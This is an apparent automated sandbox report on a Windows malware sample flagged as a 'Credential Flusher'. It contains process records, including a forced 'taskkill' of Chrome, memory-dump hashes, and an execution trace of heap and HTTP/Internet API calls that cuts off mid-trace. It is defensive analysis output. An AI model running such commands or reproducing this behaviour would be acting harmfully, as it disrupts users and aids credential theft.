                                                                                                                                      • Rule: JoeSecurity_CredentialFlusher, Description: Yara detected Credential Flusher, Source: 0000004E.00000002.2953026392.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:79
                                                                                                                                      Start time:21:23:49
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:80
                                                                                                                                      Start time:21:23:49
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Reset < >
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1752975134.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_51a0000_8ObkdHP9Hq.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b09db75f647cd04c5bd32b942ba047ddf2b3940e7348a71dd271c28f22539095
                                                                                                                                        • Instruction ID: 541403fa4fec21ecb44b3416ad7c53d299a8e9ef5af5b6c9b2405c32543fbd85
                                                                                                                                        • Opcode Fuzzy Hash: b09db75f647cd04c5bd32b942ba047ddf2b3940e7348a71dd271c28f22539095
                                                                                                                                        • Instruction Fuzzy Hash: 7C1191EF14C114BDB167D5412B58ABB676EE6DA7307328426F403C6503D3990F9E6131
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1752975134.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_51a0000_8ObkdHP9Hq.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bc7dd94228feb9a935f3e5952882007acee0034905d0b953e8e62013974e108c
                                                                                                                                        • Instruction ID: f07a21edffe265275355c58c56aa6d3c94b70eb0bf380ab1355ed4ab9e934b9e
                                                                                                                                        • Opcode Fuzzy Hash: bc7dd94228feb9a935f3e5952882007acee0034905d0b953e8e62013974e108c
                                                                                                                                        • Instruction Fuzzy Hash: E821D0AF14C2146DB2A3D29527586B66B6EE6CF7303318426F403D6503E3990B9E6131
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1752975134.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_51a0000_8ObkdHP9Hq.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b41d8c46ad0448c0fb6392b9a04ed6636112b83c18d09ab56d827b9eec37d5ac
                                                                                                                                        • Instruction ID: e62befef490bb494690ca5758ea71f72e8a900bb975d7d0b8642b13792202071
                                                                                                                                        • Opcode Fuzzy Hash: b41d8c46ad0448c0fb6392b9a04ed6636112b83c18d09ab56d827b9eec37d5ac
                                                                                                                                        • Instruction Fuzzy Hash: 7E11C0EF14C2046DF2A3D1912B6CAB76B6EE7DB730731846AF042D6143E3990B8E6131
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1752975134.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_51a0000_8ObkdHP9Hq.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e2d8b6746bca3879b7f7e5b7a5bca824bc3c4a4887f4230415723eb1d79df675
                                                                                                                                        • Instruction ID: 605b1bfc5f757fcec173e89cc65d473e92bbf37636af2393832abcf6999696cf
                                                                                                                                        • Opcode Fuzzy Hash: e2d8b6746bca3879b7f7e5b7a5bca824bc3c4a4887f4230415723eb1d79df675
                                                                                                                                        • Instruction Fuzzy Hash: F811C1EF14C114ADB167D5422B58ABB676EE6CA730732842AF003D6503D3990F9E6131
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1752975134.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_51a0000_8ObkdHP9Hq.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f0a462f0513bc8c64d7bc87aba8c7e017b86f5778d84f9b61526c81fde6f3c64
                                                                                                                                        • Instruction ID: bd05b01c403ca87e7533580f3bc87f5401dd8f1d70b37d911abebbf13d548440
                                                                                                                                        • Opcode Fuzzy Hash: f0a462f0513bc8c64d7bc87aba8c7e017b86f5778d84f9b61526c81fde6f3c64
                                                                                                                                        • Instruction Fuzzy Hash: 0011B2EF10C1107DB167C5812B58AB6676EE6CA734731842AF003C6543D3990F9E6231
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1752975134.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_51a0000_8ObkdHP9Hq.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c6f13398022d9599c04e50dfddd4ccb56278784d43ca821f54029ebfffc0374b
                                                                                                                                        • Instruction ID: 406081f8bfab8204b28bdc39049fba25190c186a2fd18e133a1d47b7c5e97044
                                                                                                                                        • Opcode Fuzzy Hash: c6f13398022d9599c04e50dfddd4ccb56278784d43ca821f54029ebfffc0374b
                                                                                                                                        • Instruction Fuzzy Hash: 3B01CCEB10D1146DB262D2923B68AF76B69E6CB334336847BF402C5543D3890F9E6232
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1752975134.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_51a0000_8ObkdHP9Hq.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0051063535fcdecc1aa18010895264f894ef5d5554ee906208c3e0fd533b8d65
                                                                                                                                        • Instruction ID: 5f8e9c9a6976f51eb7f35e02a86258cbf113f76c2a2152525a206e3a5144d9c4
                                                                                                                                        • Opcode Fuzzy Hash: 0051063535fcdecc1aa18010895264f894ef5d5554ee906208c3e0fd533b8d65
                                                                                                                                        • Instruction Fuzzy Hash: 16015EBB14C2146EB1A2D1922B1CABB676DE6DB730731887BF402C5543E3C90F9E6231
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1752975134.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_51a0000_8ObkdHP9Hq.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4aff12953f3cf86eae3a586ddd1a54d48eac054d2c3268b7393f110701b950d5
                                                                                                                                        • Instruction ID: 0a2cab1fc66271e80b4709770adf74b748d354e80127806ab3b46a25031cb296
                                                                                                                                        • Opcode Fuzzy Hash: 4aff12953f3cf86eae3a586ddd1a54d48eac054d2c3268b7393f110701b950d5
                                                                                                                                        • Instruction Fuzzy Hash: 03F04FEB14D1187DB162E6812B58AFB672DE5CA730735842AF402D5543D38D0B9E5271

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:9.4%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:9.4%
                                                                                                                                        Total number of Nodes:1842
                                                                                                                                        Total number of Limit Nodes:13
                                                                                                                                        execution_graph 12805 dbb8b9 12812 dbb7b5 12805->12812 12807 dbb906 12824 dbb718 12807->12824 12808 dbb8e1 Concurrency::details::_Reschedule_chore 12808->12807 12820 dbcbae 12808->12820 12811 dbb91e 12813 dbb7c1 Concurrency::details::_Reschedule_chore 12812->12813 12814 dbb7f2 12813->12814 12815 dbc6ac GetSystemTimePreciseAsFileTime 12813->12815 12814->12808 12816 dbb7d6 12815->12816 12834 da2b10 12816->12834 12818 dbb7dc __Mtx_unlock 12819 da2b10 4 API calls 12818->12819 12819->12814 12821 dbcbcc 12820->12821 12822 dbcbbc TpCallbackUnloadDllOnCompletion 12820->12822 12821->12807 12822->12821 12825 dbb724 Concurrency::details::_Reschedule_chore 12824->12825 12826 dbb77e 12825->12826 12827 dbc6ac GetSystemTimePreciseAsFileTime 12825->12827 12826->12811 12828 dbb739 12827->12828 12829 da2b10 4 API calls 12828->12829 12830 dbb73f __Mtx_unlock 12829->12830 12831 da2b10 4 API calls 12830->12831 12832 dbb75c __Cnd_broadcast 12831->12832 12832->12826 12833 da2b10 4 API calls 12832->12833 12833->12826 12835 da2b1a 12834->12835 12836 da2b1c 12834->12836 12835->12818 12837 dbc26a 4 API calls 12836->12837 12838 da2b22 12837->12838 12839 dd38af ___std_exception_copy RtlAllocateHeap 12838->12839 12840 da2b68 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12839->12840 12840->12818 12593 da7430 12606 db7a00 12593->12606 12595 da7465 12596 db7a00 RtlAllocateHeap 12595->12596 12597 da7478 12596->12597 12598 db7a00 RtlAllocateHeap 12597->12598 12599 da7488 12598->12599 12600 db7a00 RtlAllocateHeap 12599->12600 12601 da749d 12600->12601 12602 db7a00 RtlAllocateHeap 12601->12602 12603 da74b2 12602->12603 12604 db7a00 RtlAllocateHeap 12603->12604 12605 da74c4 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12604->12605 12607 db7a26 12606->12607 12608 db7a2d 12607->12608 12609 db7a62 12607->12609 12610 db7a81 12607->12610 12608->12595 12611 db7ab9 12609->12611 12612 db7a69 12609->12612 12613 dbd3e2 RtlAllocateHeap 12610->12613 12616 db7a6f __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 12610->12616 12625 da2480 12611->12625 12617 dbd3e2 12612->12617 12613->12616 12616->12595 12620 dbd3e7 __fassign 12617->12620 12619 dbd401 12619->12616 12620->12619 12622 da2480 std::_Xinvalid_argument 12620->12622 12629 dd8be1 12620->12629 12621 dbd40d std::_Xinvalid_argument 12621->12616 12622->12621 12633 dd38af 12622->12633 12624 da24c3 12624->12616 12626 da248e std::_Xinvalid_argument 12625->12626 12627 dd38af ___std_exception_copy RtlAllocateHeap 12626->12627 12628 da24c3 12627->12628 12628->12616 12632 ddb04b __fassign 12629->12632 12630 ddb074 RtlAllocateHeap 12631 ddb087 __dosmaperr 12630->12631 12630->12632 12631->12620 12632->12630 12632->12631 12634 dd38bc 12633->12634 12636 dd38d9 ___std_exception_destroy ___std_exception_copy 12633->12636 12635 dd8be1 ___std_exception_copy RtlAllocateHeap 12634->12635 12634->12636 12635->12636 12636->12624 14534 da7990 14535 db7a00 RtlAllocateHeap 14534->14535 14536 da79db 14535->14536 14537 da5c10 4 API calls 14536->14537 14538 da79e3 14537->14538 14539 db8320 RtlAllocateHeap 14538->14539 14540 da79f3 14539->14540 14541 db7a00 RtlAllocateHeap 14540->14541 14542 da7a0e 14541->14542 14543 da5c10 4 API calls 14542->14543 14544 da7a15 14543->14544 14545 db80c0 RtlAllocateHeap 14544->14545 14547 da7a38 shared_ptr 14545->14547 14546 da7aa5 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14547->14546 14568 da6d70 14547->14568 14549 da7b1b shared_ptr 14550 db7a00 RtlAllocateHeap 14549->14550 14567 da7c06 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14549->14567 14551 da7b75 14550->14551 14552 da5c10 4 API calls 14551->14552 14553 da7b7d 14552->14553 14554 db7a00 RtlAllocateHeap 14553->14554 14555 da7b98 14554->14555 14556 da5c10 4 API calls 14555->14556 14557 da7ba0 14556->14557 14558 db8320 RtlAllocateHeap 14557->14558 14559 da7bb1 14558->14559 14560 db8220 RtlAllocateHeap 14559->14560 14561 da7bc1 14560->14561 14562 db7a00 RtlAllocateHeap 14561->14562 14563 da7bdc 14562->14563 14564 da5c10 4 API calls 14563->14564 14565 da7be3 14564->14565 14566 db80c0 RtlAllocateHeap 14565->14566 14566->14567 14569 da6db0 14568->14569 14570 da6dca 14569->14570 14571 da6df5 14569->14571 14572 db80c0 RtlAllocateHeap 14570->14572 14573 db80c0 RtlAllocateHeap 14571->14573 14574 da6deb shared_ptr 14572->14574 14573->14574 14574->14549 14580 da91b0 14581 da91e5 14580->14581 14582 db80c0 RtlAllocateHeap 14581->14582 14583 da9218 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14582->14583 14602 da8b30 14603 da8b7c 14602->14603 14604 db7a00 RtlAllocateHeap 14603->14604 14605 da8b8c 14604->14605 14606 da5c10 4 API calls 14605->14606 14607 da8b97 14606->14607 14608 db80c0 RtlAllocateHeap 14607->14608 14609 da8be3 14608->14609 14610 db80c0 RtlAllocateHeap 14609->14610 14611 da8c35 14610->14611 14612 db8220 RtlAllocateHeap 14611->14612 14613 da8c47 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14612->14613 12908 db6c70 12911 db6ca0 12908->12911 12909 db7a00 RtlAllocateHeap 12909->12911 12910 da5c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12910->12911 12911->12909 12911->12910 12914 db47b0 12911->12914 12913 db6cec Sleep 12913->12911 12915 db47eb 12914->12915 13028 db4e70 shared_ptr 12914->13028 12916 db7a00 RtlAllocateHeap 12915->12916 12915->13028 12917 db480c 12916->12917 13175 da5c10 12917->13175 12919 db4f59 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12919->12913 12920 db4813 12922 db7a00 RtlAllocateHeap 12920->12922 12924 db4825 12922->12924 12923 db5015 13270 da6950 12923->13270 12926 db7a00 RtlAllocateHeap 12924->12926 12927 db4837 12926->12927 13182 dabe30 12927->13182 12929 db50de shared_ptr 13280 da7d30 12929->13280 12930 db4843 12931 db7a00 RtlAllocateHeap 12930->12931 12934 db4858 12931->12934 12933 db5025 shared_ptr 12933->12929 12954 db6c46 12933->12954 12936 db7a00 RtlAllocateHeap 12934->12936 12935 db50ed 13359 da45b0 12935->13359 12938 db4870 12936->12938 12940 da5c10 4 API calls 12938->12940 12939 db50fa 13363 da8380 12939->13363 12942 db4877 12940->12942 13206 da8580 12942->13206 12943 db5106 12944 da45b0 RtlAllocateHeap 12943->12944 12947 db5113 12944->12947 12946 db7a00 RtlAllocateHeap 12946->12954 12951 da45b0 RtlAllocateHeap 12947->12951 12948 db4883 12949 db7a00 RtlAllocateHeap 12948->12949 13031 db4afd 12948->13031 12952 db489f 12949->12952 12950 db7a00 RtlAllocateHeap 12953 db4b2f 12950->12953 12955 db5130 12951->12955 12956 db7a00 RtlAllocateHeap 12952->12956 12957 db7a00 RtlAllocateHeap 12953->12957 12954->12946 12958 da5c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12954->12958 12965 db47b0 15 API calls 12954->12965 12959 db7a00 RtlAllocateHeap 12955->12959 12960 db48b7 12956->12960 12961 db4b44 12957->12961 12958->12954 12962 db514e 12959->12962 12963 da5c10 4 API calls 12960->12963 12964 db7a00 RtlAllocateHeap 12961->12964 12966 da5c10 4 API calls 12962->12966 12967 db48be 12963->12967 12968 db4b56 12964->12968 12970 db6cec Sleep 12965->12970 12971 db5155 12966->12971 12972 da8580 RtlAllocateHeap 12967->12972 12969 dabe30 10 API calls 12968->12969 12974 db4b62 12969->12974 12970->12954 12975 db7a00 RtlAllocateHeap 12971->12975 12973 db48ca 12972->12973 12978 db7a00 RtlAllocateHeap 12973->12978 12973->13031 12976 db7a00 RtlAllocateHeap 12974->12976 12977 db516a 12975->12977 12979 db4b77 12976->12979 12980 da5c10 4 API calls 12977->12980 12981 db48e7 12978->12981 12982 db7a00 RtlAllocateHeap 12979->12982 12987 db5171 12980->12987 12983 da5c10 4 API calls 12981->12983 12984 db4b8f 12982->12984 12989 db48ef 12983->12989 12985 da5c10 4 API calls 12984->12985 12986 db4b96 12985->12986 12988 da8580 RtlAllocateHeap 12986->12988 12991 db80c0 RtlAllocateHeap 12987->12991 12990 db4ba2 12988->12990 12992 db80c0 RtlAllocateHeap 12989->12992 12993 db7a00 RtlAllocateHeap 12990->12993 12990->13028 13001 db51ed 12991->13001 13000 db4959 shared_ptr 12992->13000 12994 db4bbe 12993->12994 12995 db7a00 RtlAllocateHeap 12994->12995 12996 db4bd6 12995->12996 12998 da5c10 4 API calls 12996->12998 12997 db7a00 RtlAllocateHeap 13002 db49e6 12997->13002 12999 db4bdd 12998->12999 13003 da8580 RtlAllocateHeap 12999->13003 13000->12997 13375 db7de0 13001->13375 13005 da5c10 4 API calls 13002->13005 13006 db4be9 13003->13006 13011 db49ee 13005->13011 13009 db7a00 RtlAllocateHeap 13006->13009 13006->13028 13007 db5259 13388 db7760 13007->13388 13012 db4c06 13009->13012 13010 db52b8 13017 db5335 shared_ptr 13010->13017 13400 db8ca0 13010->13400 13013 db80c0 RtlAllocateHeap 13011->13013 13014 da5c10 4 API calls 13012->13014 13019 db4a49 shared_ptr 13013->13019 13016 db4c0e 13014->13016 13020 db4c5a 13016->13020 13021 db4f97 13016->13021 13024 db80c0 RtlAllocateHeap 13017->13024 13019->13031 13212 da98f0 13019->13212 13023 db80c0 RtlAllocateHeap 13020->13023 13242 db8200 13021->13242 13032 db4c78 shared_ptr 13023->13032 13037 db53fd shared_ptr 13024->13037 13025 db4f9c 13245 dbc1d9 13025->13245 13027 db4ad5 __dosmaperr 13027->13031 13217 dd8ab6 13027->13217 13028->12919 13248 da65e0 13028->13248 13030 db7a00 RtlAllocateHeap 13033 db4d05 13030->13033 13031->12950 13031->13025 13032->13028 13032->13030 13035 da5c10 4 API calls 13033->13035 13034 da45b0 RtlAllocateHeap 13036 db549d 13034->13036 13040 db4d0d 13035->13040 13038 db7a00 RtlAllocateHeap 13036->13038 13037->13034 13039 db54b7 13038->13039 13041 da5c10 4 API calls 13039->13041 13042 db80c0 RtlAllocateHeap 13040->13042 13043 db54c2 13041->13043 13051 db4d68 shared_ptr 13042->13051 13044 da45b0 RtlAllocateHeap 13043->13044 13045 db54d7 13044->13045 13046 db7a00 RtlAllocateHeap 13045->13046 13048 db54eb 13046->13048 13047 db7a00 RtlAllocateHeap 13049 db4df7 13047->13049 13050 da5c10 4 API calls 13048->13050 13052 db7a00 RtlAllocateHeap 13049->13052 13053 db54f6 13050->13053 13051->13028 13051->13047 13054 db4e0c 13052->13054 13055 db7a00 RtlAllocateHeap 13053->13055 13056 db7a00 RtlAllocateHeap 13054->13056 13057 db5514 13055->13057 13058 db4e27 13056->13058 13059 da5c10 4 API calls 13057->13059 13060 da5c10 4 API calls 13058->13060 13061 db551f 13059->13061 13062 db4e2e 13060->13062 13063 db7a00 RtlAllocateHeap 13061->13063 13066 db80c0 RtlAllocateHeap 13062->13066 13064 db553d 13063->13064 13065 da5c10 4 API calls 13064->13065 13067 db5548 13065->13067 13068 db4e67 13066->13068 13069 db7a00 RtlAllocateHeap 13067->13069 13221 db4390 13068->13221 13071 db5566 13069->13071 13072 da5c10 4 API calls 13071->13072 13073 db5571 13072->13073 13074 db7a00 RtlAllocateHeap 13073->13074 13075 db558f 13074->13075 13076 da5c10 4 API calls 13075->13076 13077 db559a 13076->13077 13078 db7a00 RtlAllocateHeap 13077->13078 13079 db55b8 13078->13079 13080 da5c10 4 API calls 13079->13080 13081 db55c3 13080->13081 13082 db7a00 RtlAllocateHeap 13081->13082 13083 db55e1 13082->13083 13084 da5c10 4 API calls 13083->13084 13085 db55ec 13084->13085 13086 db7a00 RtlAllocateHeap 13085->13086 13087 db560a 13086->13087 13088 da5c10 4 API calls 13087->13088 13089 db5615 13088->13089 13090 db7a00 RtlAllocateHeap 13089->13090 13091 db5631 13090->13091 13092 da5c10 4 API calls 13091->13092 13093 db563c 13092->13093 13094 db7a00 RtlAllocateHeap 13093->13094 13095 db5653 13094->13095 13096 da5c10 4 API calls 13095->13096 13097 db565e 13096->13097 13098 db7a00 RtlAllocateHeap 13097->13098 13099 db5675 13098->13099 13100 da5c10 4 API calls 13099->13100 13101 db5680 13100->13101 13102 db7a00 RtlAllocateHeap 13101->13102 13103 db569c 13102->13103 13104 da5c10 4 API calls 13103->13104 13105 db56a7 13104->13105 13412 db8320 13105->13412 13107 db56bb 13416 db8220 13107->13416 13109 db56cf 13110 db8220 RtlAllocateHeap 13109->13110 13111 db56e3 13110->13111 13112 db8220 RtlAllocateHeap 13111->13112 13113 db56f7 13112->13113 13114 db8320 RtlAllocateHeap 13113->13114 13115 db570b 13114->13115 13116 db8220 RtlAllocateHeap 13115->13116 13117 db571f 13116->13117 13118 db8320 RtlAllocateHeap 13117->13118 13119 db5733 13118->13119 13120 db8220 RtlAllocateHeap 13119->13120 13121 db5747 13120->13121 13122 db8320 RtlAllocateHeap 13121->13122 13123 db575b 13122->13123 13124 db8220 RtlAllocateHeap 13123->13124 13125 db576f 13124->13125 13126 db8320 RtlAllocateHeap 13125->13126 13127 db5783 13126->13127 13128 db8220 RtlAllocateHeap 13127->13128 13129 db5797 13128->13129 13130 db8320 RtlAllocateHeap 13129->13130 13131 db57ab 13130->13131 13132 db8220 RtlAllocateHeap 13131->13132 13133 db57bf 13132->13133 13134 db8320 RtlAllocateHeap 13133->13134 13135 db57d3 13134->13135 13136 db8220 RtlAllocateHeap 13135->13136 13137 db57e7 13136->13137 13138 db8320 RtlAllocateHeap 13137->13138 13139 db57fb 13138->13139 13140 db8220 RtlAllocateHeap 13139->13140 13141 db580f 13140->13141 13142 db8320 RtlAllocateHeap 13141->13142 13143 db5823 13142->13143 13144 db8220 RtlAllocateHeap 13143->13144 13145 db5837 13144->13145 13146 db8220 RtlAllocateHeap 13145->13146 13147 db584b 13146->13147 13148 db8220 RtlAllocateHeap 13147->13148 13149 db585f 13148->13149 13150 db8320 RtlAllocateHeap 13149->13150 13151 db5873 shared_ptr 13150->13151 13152 db665b 13151->13152 13153 db6507 13151->13153 13154 db7a00 RtlAllocateHeap 13152->13154 13155 db7a00 RtlAllocateHeap 13153->13155 13156 db6670 13154->13156 13157 db651d 13155->13157 13158 db7a00 RtlAllocateHeap 13156->13158 13159 da5c10 4 API calls 13157->13159 13160 db6685 13158->13160 13161 db6528 13159->13161 13424 da49a0 13160->13424 13163 db8320 RtlAllocateHeap 13161->13163 13174 db653c shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13163->13174 13164 db6694 13165 db7760 RtlAllocateHeap 13164->13165 13171 db66db 13165->13171 13166 db67d6 13167 db7a00 RtlAllocateHeap 13166->13167 13168 db67ec 13167->13168 13170 da5c10 4 API calls 13168->13170 13169 db8ca0 RtlAllocateHeap 13169->13171 13172 db67f7 13170->13172 13171->13166 13171->13169 13173 db8220 RtlAllocateHeap 13172->13173 13173->13174 13174->12913 13431 da5940 13175->13431 13179 da5c6a 13450 da4b30 13179->13450 13181 da5c7b shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13181->12920 13183 dabe82 13182->13183 13184 dac281 13182->13184 13183->13184 13186 dabe96 Sleep InternetOpenW InternetConnectA 13183->13186 13185 db80c0 RtlAllocateHeap 13184->13185 13190 dac22e shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13185->13190 13187 db7a00 RtlAllocateHeap 13186->13187 13188 dabf18 13187->13188 13189 da5c10 4 API calls 13188->13189 13192 dabf23 HttpOpenRequestA 13189->13192 13190->12930 13193 dabf4c shared_ptr 13192->13193 13194 db7a00 RtlAllocateHeap 13193->13194 13195 dabfb4 13194->13195 13196 da5c10 4 API calls 13195->13196 13197 dabfbf 13196->13197 13198 db7a00 RtlAllocateHeap 13197->13198 13199 dabfd8 13198->13199 13200 da5c10 4 API calls 13199->13200 13201 dabfe3 HttpSendRequestA 13200->13201 13204 dac006 shared_ptr 13201->13204 13203 dac08e InternetReadFile 13205 dac0b5 13203->13205 13204->13203 13210 da86a0 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13206->13210 13211 da85d5 shared_ptr 13206->13211 13207 da8767 13209 db8200 RtlAllocateHeap 13207->13209 13208 db80c0 RtlAllocateHeap 13208->13211 13209->13210 13210->12948 13211->13207 13211->13208 13211->13210 13213 db7a00 RtlAllocateHeap 13212->13213 13214 da991e 13213->13214 13215 da5c10 4 API calls 13214->13215 13216 da9927 shared_ptr __cftof __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13215->13216 13216->13027 13218 dd8ad1 13217->13218 13506 dd8868 13218->13506 13220 dd8adb 13220->13031 13222 db7a00 RtlAllocateHeap 13221->13222 13223 db43d2 13222->13223 13224 db7a00 RtlAllocateHeap 13223->13224 13225 db43e4 13224->13225 13226 da8580 RtlAllocateHeap 13225->13226 13227 db43ed 13226->13227 13228 db43f8 shared_ptr 13227->13228 13229 db4646 13227->13229 13233 db80c0 RtlAllocateHeap 13228->13233 13239 db7a00 RtlAllocateHeap 13228->13239 13240 db4610 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13228->13240 13512 db9280 13228->13512 13517 db3640 13228->13517 13230 db7a00 RtlAllocateHeap 13229->13230 13231 db4657 13230->13231 13232 db7a00 RtlAllocateHeap 13231->13232 13234 db466c 13232->13234 13233->13228 13235 db7a00 RtlAllocateHeap 13234->13235 13237 db467e 13235->13237 13238 db3640 13 API calls 13237->13238 13238->13240 13239->13228 13240->13028 13243 dbc1d9 RtlAllocateHeap 13242->13243 13244 db820a 13243->13244 13244->13025 14250 dbc15d 13245->14250 13247 dbc1ea std::_Xinvalid_argument 13247->13028 13249 da663f 13248->13249 13250 db7a00 RtlAllocateHeap 13249->13250 13251 da66a6 13250->13251 13252 da5c10 4 API calls 13251->13252 13253 da66b1 13252->13253 13254 da22c0 3 API calls 13253->13254 13255 da66c9 shared_ptr 13254->13255 13256 db7a00 RtlAllocateHeap 13255->13256 13261 da68e3 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13255->13261 13257 da6732 13256->13257 13258 da5c10 4 API calls 13257->13258 13259 da673d 13258->13259 13260 da22c0 3 API calls 13259->13260 13266 da6757 shared_ptr 13260->13266 13261->12923 13262 da6852 13263 db80c0 RtlAllocateHeap 13262->13263 13265 da689c 13263->13265 13264 db7a00 RtlAllocateHeap 13264->13266 13267 db80c0 RtlAllocateHeap 13265->13267 13266->13261 13266->13262 13266->13264 13268 da5c10 4 API calls 13266->13268 13269 da22c0 3 API calls 13266->13269 13267->13261 13268->13266 13269->13266 13271 da69c8 shared_ptr 13270->13271 13279 da6ca1 13270->13279 13272 da6d63 13271->13272 13276 db80c0 RtlAllocateHeap 13271->13276 13277 da6ce3 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13271->13277 13278 db9280 RtlAllocateHeap 13271->13278 13271->13279 13275 db8200 RtlAllocateHeap 13272->13275 13273 da6cc4 13274 db80c0 RtlAllocateHeap 13273->13274 13274->13277 13275->13277 13276->13271 13277->12933 13278->13271 13279->13272 13279->13273 13281 da7d96 __cftof 13280->13281 13282 db7a00 RtlAllocateHeap 13281->13282 13294 da7ee8 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13281->13294 13283 da7dc7 13282->13283 13284 da5c10 4 API calls 13283->13284 13285 da7dd2 13284->13285 13286 db7a00 